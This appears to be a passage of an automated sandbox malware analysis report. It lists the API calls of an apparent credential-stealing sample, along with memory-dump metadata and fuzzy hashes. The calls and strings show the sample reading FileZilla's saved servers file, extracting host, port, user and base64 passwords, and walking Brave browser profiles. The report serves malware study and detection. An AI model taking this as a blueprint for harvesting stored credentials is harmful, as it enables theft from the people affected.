                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501BC3
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501BCF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501BF8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501C25
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00501C30
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501C57
                        • lstrlen.KERNEL32(00521794), ref: 00501C69
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501C8B
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501C97
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501CC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501CEF
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00501CFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501D21
                        • lstrlen.KERNEL32(00521794), ref: 00501D33
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501D55
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501D61
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501D8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501DB9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00501DC4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501DED
                        • lstrlen.KERNEL32(00521794), ref: 00501E19
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501E36
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501E42
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501E68
                        • lstrlen.KERNEL32(0103CF80), ref: 00501E7E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501EB2
                        • lstrlen.KERNEL32(00521794), ref: 00501EC6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501EE3
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501EEF
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501F15
                        • lstrlen.KERNEL32(0103D328), ref: 00501F2B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501F5F
                        • lstrlen.KERNEL32(00521794), ref: 00501F73
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501F90
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00501F9C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00501FC2
                        • lstrlen.KERNEL32(0102B220), ref: 00501FD8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00502000
                        • lstrcat.KERNEL32(00000000,00000000), ref: 0050200B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00502036
                        • lstrlen.KERNEL32(00521794), ref: 00502048
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00502067
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00502073
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00502098
                        • lstrlen.KERNEL32(?), ref: 005020AC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005020D0
                        • lstrcat.KERNEL32(00000000,?), ref: 005020DE
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00502103
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050213F
                        • lstrlen.KERNEL32(0103D010), ref: 0050214E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00502176
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00502181
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                        • String ID: \*.*
                        • API String ID: 712834838-1173974218
                        • Opcode ID: 877281517e51bbfb3c4e3b59621542dcc11905e1a84633ae475a4545b9767661
                        • Instruction ID: 0b04cb3c0794b3e18e8bb161b638c3a6600712c10c36a22dfd24c3fdec7f28e2
                        • Opcode Fuzzy Hash: 877281517e51bbfb3c4e3b59621542dcc11905e1a84633ae475a4545b9767661
                        • Instruction Fuzzy Hash: DA62A331A11A1A9BCB31AF65CD49ABF7BB9FF40704F084029F90597291DB78DD02CB99
                        APIs
                        • wsprintfA.USER32 ref: 0050392C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00503943
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 0050396C
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 00503986
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 005039BF
                        • lstrcpy.KERNEL32(00000000,?), ref: 005039E7
                        • lstrcat.KERNEL32(00000000,00000000), ref: 005039F2
                        • lstrlen.KERNEL32(00521794), ref: 005039FD
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503A1A
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00503A26
                        • lstrlen.KERNEL32(?), ref: 00503A33
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503A53
                        • lstrcat.KERNEL32(00000000,?), ref: 00503A61
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503A8A
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00503ACE
                        • lstrlen.KERNEL32(?), ref: 00503AD8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503B05
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00503B10
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503B36
                        • lstrlen.KERNEL32(00521794), ref: 00503B48
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503B6A
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00503B76
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503B9E
                        • lstrlen.KERNEL32(?), ref: 00503BB2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503BD2
                        • lstrcat.KERNEL32(00000000,?), ref: 00503BE0
                        • lstrlen.KERNEL32(01038A70), ref: 00503C0B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503C31
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00503C3C
                        • lstrlen.KERNEL32(01038B10), ref: 00503C5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503C84
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00503C8F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503CB7
                        • lstrlen.KERNEL32(00521794), ref: 00503CC9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503CE8
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00503CF4
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503D1A
                        • lstrcpy.KERNEL32(00000000,?), ref: 00503D47
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00503D52
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503D79
                        • lstrlen.KERNEL32(00521794), ref: 00503D8B
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503DAD
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00503DB9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503DE2
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503E11
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00503E1C
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503E43
                        • lstrlen.KERNEL32(00521794), ref: 00503E55
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503E77
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00503E83
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503EAC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503EDB
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00503EE6
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503F0D
                        • lstrlen.KERNEL32(00521794), ref: 00503F1F
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503F41
                        • lstrcat.KERNEL32(00000000,00521794), ref: 00503F4D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503F75
                        • lstrlen.KERNEL32(?), ref: 00503F89
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503FA9
                        • lstrcat.KERNEL32(00000000,?), ref: 00503FB7
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00503FE0
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 0050401F
                        • lstrlen.KERNEL32(0103D010), ref: 0050402E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00504056
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00504061
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 0050408A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 005040CE
                        • lstrcat.KERNEL32(00000000), ref: 005040DB
                        • FindNextFileA.KERNEL32(00000000,?), ref: 005042D9
                        • FindClose.KERNEL32(00000000), ref: 005042E8
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 1006159827-1013718255
                        • Opcode ID: 9bd3538ccb0bf05339a2a0df402a3770be775b579d4a64526e52cc8eadf5cab8
                        • Instruction ID: f80e5330fefc52dee3f0579410c7b0150c377246f0adced8d3e7ffb2b7a85aae
                        • Opcode Fuzzy Hash: 9bd3538ccb0bf05339a2a0df402a3770be775b579d4a64526e52cc8eadf5cab8
                        • Instruction Fuzzy Hash: C162C671A1161A9BCB31AF65DD49AAF7BBDFF40304F048129F905A7290DB78DE01CB98
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506995
                        • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 005069C8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506A02
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506A29
                        • lstrcat.KERNEL32(00000000,00000000), ref: 00506A34
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506A5D
                        • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00506A77
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506A99
                        • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00506AA5
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506AD0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506B00
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00506B35
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506B9D
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506BCD
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                        • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                        • API String ID: 313953988-555421843
                        • Opcode ID: 56f8af7cb159d6bafa78727ec1c14de2d0d1c123002bf733c69ecc77c03b02ca
                        • Instruction ID: 287285c7d3339ce228611b11c6bf6826d8e66cc30365a17565f721c3f5e9e9be
                        • Opcode Fuzzy Hash: 56f8af7cb159d6bafa78727ec1c14de2d0d1c123002bf733c69ecc77c03b02ca
                        • Instruction Fuzzy Hash: 2242C370A0121AABDB21ABB1DD49AAF7F79FF04704F088419FA05E7291DB78DD12CB54
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDBC1
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDBE4
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDBEF
                        • lstrlen.KERNEL32(00524CA8), ref: 004FDBFA
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDC17
                        • lstrcat.KERNEL32(00000000,00524CA8), ref: 004FDC23
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDC4C
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDC8F
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDCBF
                        • FindFirstFileA.KERNEL32(00000000,?), ref: 004FDCD0
                        • StrCmpCA.SHLWAPI(?,005217A0), ref: 004FDCF0
                        • StrCmpCA.SHLWAPI(?,005217A4), ref: 004FDD0A
                        • lstrlen.KERNEL32(0051CFEC), ref: 004FDD1D
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FDD47
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDD70
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDD7B
                        • lstrlen.KERNEL32(00521794), ref: 004FDD86
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDDA3
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDDAF
                        • lstrlen.KERNEL32(?), ref: 004FDDBC
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDDDF
                        • lstrcat.KERNEL32(00000000,?), ref: 004FDDED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDE19
                        • lstrlen.KERNEL32(00521794), ref: 004FDE3D
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FDE6F
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDE7B
                        • lstrlen.KERNEL32(010388F0), ref: 004FDE8A
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDEB0
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDEBB
                        • lstrlen.KERNEL32(00521794), ref: 004FDEC6
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FDEE6
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDEF2
                        • lstrlen.KERNEL32(01038A40), ref: 004FDF01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDF27
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDF32
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDF5E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDFA5
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FDFB1
                        • lstrlen.KERNEL32(010388F0), ref: 004FDFC0
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FDFE9
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FDFF4
                        • lstrlen.KERNEL32(00521794), ref: 004FDFFF
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE022
                        • lstrcat.KERNEL32(00000000,00521794), ref: 004FE02E
                        • lstrlen.KERNEL32(01038A40), ref: 004FE03D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE063
                        • lstrcat.KERNEL32(00000000,00000000), ref: 004FE06E
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE09A
                        • StrCmpCA.SHLWAPI(?,Brave), ref: 004FE0CD
                        • StrCmpCA.SHLWAPI(?,Preferences), ref: 004FE0E7
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FE11F
                        • lstrlen.KERNEL32(0103D010), ref: 004FE12E
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE155
                        • lstrcat.KERNEL32(00000000,?), ref: 004FE15D
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE19F
                        • lstrcat.KERNEL32(00000000), ref: 004FE1A9
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 004FE1D0
                        • CopyFileA.KERNEL32(00000000,?,00000001), ref: 004FE1F9
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004FE22F
                        • lstrlen.KERNEL32(01038A70), ref: 004FE23D
                        • lstrcpy.KERNEL32(00000000,?), ref: 004FE261
                        • lstrcat.KERNEL32(00000000,01038A70), ref: 004FE269
                        • FindNextFileA.KERNEL32(00000000,?), ref: 004FE988
                        • FindClose.KERNEL32(00000000), ref: 004FE997
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$lstrcat$lstrlen$FileFind$CloseCopyFirstNext
                        • String ID: Brave$Preferences$\Brave\Preferences
                        • API String ID: 1346089424-1230934161
                        • Opcode ID: 6b909ca1b74494291fc0c4f96b7a88f1430ffc7d8b1972e832471a9ddb7786e7
                        • Instruction ID: c581a5c14479b795d4111bdf211dad6d17b4a79ac0f2103f4e064c81396263ad
                        • Opcode Fuzzy Hash: 6b909ca1b74494291fc0c4f96b7a88f1430ffc7d8b1972e832471a9ddb7786e7
                        • Instruction Fuzzy Hash: 9D528571A1120E9BDB21AF66DD89ABF77B9AF44304F044029FA0597361DB7CDC42CB58
                        APIs
                        • lstrcpy.KERNEL32(00000000,?), ref: 004F60FF
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F6152
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F6185
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F61B5
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F61F0
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 004F6223
                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004F6233
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009DB000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009E9000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500960257.00000000009EA000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501084226.0000000000B8F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1501104498.0000000000B90000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4f0000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$InternetOpen
                        • String ID: "$------
                        • API String ID: 2041821634-2370822465
                        • Opcode ID: 1b165bd742117e62be5480d2bf18aa6f8e4231a37af4d87b77d4414f8e43f8f1
                        • Instruction ID: f721cb0fdee5da824a62dab5d5b80ef116acddb70ad7d77a718138f695520548
                        • Opcode Fuzzy Hash: 1b165bd742117e62be5480d2bf18aa6f8e4231a37af4d87b77d4414f8e43f8f1
                        • Instruction Fuzzy Hash: E3528171E0121E9BDB21EFB5DD49AAF77B9EF44300F058429FA05A7251DB78DC028B98
                        APIs
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506B9D
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506BCD
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506BFD
                        • lstrcpy.KERNEL32(00000000,0051CFEC), ref: 00506C2F
                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00506C3C
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00506C43
                        • StrStrA.SHLWAPI(00000000,<Host>), ref: 00506C5A
                        • lstrlen.KERNEL32(00000000), ref: 00506C65
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506CA8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506CCF
                        • StrStrA.SHLWAPI(00000000,<Port>), ref: 00506CE2
                        • lstrlen.KERNEL32(00000000), ref: 00506CED
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506D30
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506D57
                        • StrStrA.SHLWAPI(00000000,<User>), ref: 00506D6A
                        • lstrlen.KERNEL32(00000000), ref: 00506D75
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506DB8
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506DDF
                        • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00506DF2
                        • lstrlen.KERNEL32(00000000), ref: 00506E01
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506E49
                        • lstrcpy.KERNEL32(00000000,00000000), ref: 00506E71
                        • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00506E94
                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 00506EA8
                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00506EC9
                        • LocalFree.KERNEL32(00000000), ref: 00506ED4
                        • lstrlen.KERNEL32(?), ref: 00506F6E
                        • lstrlen.KERNEL32(?), ref: 00506F81
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1500474908.00000000004F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004F0000, based on PE: true
                        • Associated: 00000000.00000002.1500446413.00000000004F0000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000527000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000057E000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000586000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.000000000059F000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500474908.0000000000728000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500665640.000000000073A000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.000000000073C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000008C6000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1500687153.00000000009AC000.00000040.00000001.01000000.00000003.sdmp
